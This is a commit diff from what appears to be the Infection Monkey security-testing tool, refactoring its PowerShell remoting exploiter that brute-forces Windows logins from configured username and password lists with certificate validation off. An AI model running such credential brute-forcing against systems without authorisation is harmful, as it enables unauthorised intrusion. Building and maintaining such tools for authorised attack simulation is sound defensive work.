Remove IP address from AuthOptions in powershell

monkey/infection_monkey/exploit/powershell.py

@@ -14,7 +14,7 @@ from infection_monkey.exploit.consts import WIN_ARCH_32, WIN_ARCH_64
 from infection_monkey.exploit.HostExploiter import HostExploiter
 from infection_monkey.exploit.powershell_utils import utils
 from infection_monkey.exploit.powershell_utils.auth_options import AuthOptions
-from infection_monkey.exploit.powershell_utils.credential_generator import CredentialGenerator
+from infection_monkey.exploit.powershell_utils.credential_generation import get_credentials
 from infection_monkey.exploit.powershell_utils.utils import (
     IClient,
     get_client_based_on_auth_options,
@@ -57,12 +57,12 @@ class PowerShellExploiter(HostExploiter):
             logging.info(e)
             return False
 
-        credentials = CredentialGenerator(
-            self.host.ip_addr,
+        credentials = get_credentials(
             self._config.exploit_user_list,
             self._config.exploit_password_list,
             is_windows_os(),
-        ).get_credentials(is_https=is_https)
+            is_https=is_https,
+        )
 
         self.client = self._authenticate_via_brute_force(credentials)
         if not self.client:
@@ -92,7 +92,6 @@ class PowerShellExploiter(HostExploiter):
 
     def _try_http(self):
         auth_options_http = AuthOptions(
-            ip_addr=self.host.ip_addr,
             username=self._config.exploit_user_list[0],
             password=self._config.exploit_password_list[0],
             is_https=False,
@@ -101,7 +100,6 @@ class PowerShellExploiter(HostExploiter):
 
     def _try_https(self):
         auth_options_http = AuthOptions(
-            ip_addr=self.host.ip_addr,
             username=self._config.exploit_user_list[0],
             password=self._config.exploit_password_list[0],
             is_https=True,
@@ -111,7 +109,7 @@ class PowerShellExploiter(HostExploiter):
     def _authenticate_via_brute_force(self, credentials: [AuthOptions]) -> Optional[IClient]:
         for credential in credentials:
             try:
-                client = PowerShellExploiter._authenticate(credential)
+                client = self._authenticate(credential)
 
                 LOG.info(
                     f"Successfully logged into {self.host.ip_addr} using Powershell. User: "
@@ -129,9 +127,8 @@ class PowerShellExploiter(HostExploiter):
 
         return None
 
-    @staticmethod
-    def _authenticate(auth_options: AuthOptions) -> IClient:
-        client = get_client_based_on_auth_options(auth_options)
+    def _authenticate(self, auth_options: AuthOptions) -> IClient:
+        client = get_client_based_on_auth_options(self.host.ip_addr, auth_options)
 
         # attempt to execute dir command to know if authentication was successful
         client.execute_cmd("dir")

monkey/infection_monkey/exploit/powershell_utils/auth_options.py

@@ -4,7 +4,6 @@ from typing import Union
 
 @dataclass
 class AuthOptions:
-    ip_addr: str
     username: Union[str, None]
     password: Union[str, None]
     is_https: bool

monkey/infection_monkey/exploit/powershell_utils/utils.py

@@ -34,7 +34,7 @@ class IClient(Protocol):
         pass
 
 
-def get_client_based_on_auth_options(auth_options: AuthOptions) -> IClient:
+def get_client_based_on_auth_options(ip_addr: str, auth_options: AuthOptions) -> IClient:
 
     # Passwordless login only works with SSL false, AUTH_BASIC and ENCRYPTION_NEVER
     if auth_options.password == "":
@@ -45,7 +45,7 @@ def get_client_based_on_auth_options(auth_options: AuthOptions) -> IClient:
     encryption = ENCRYPTION_AUTO if auth_options.password != "" else ENCRYPTION_NEVER
 
     return Client(
-        auth_options.ip_addr,
+        ip_addr,
         username=auth_options.username,
         password=auth_options.password,
         cert_validation=False,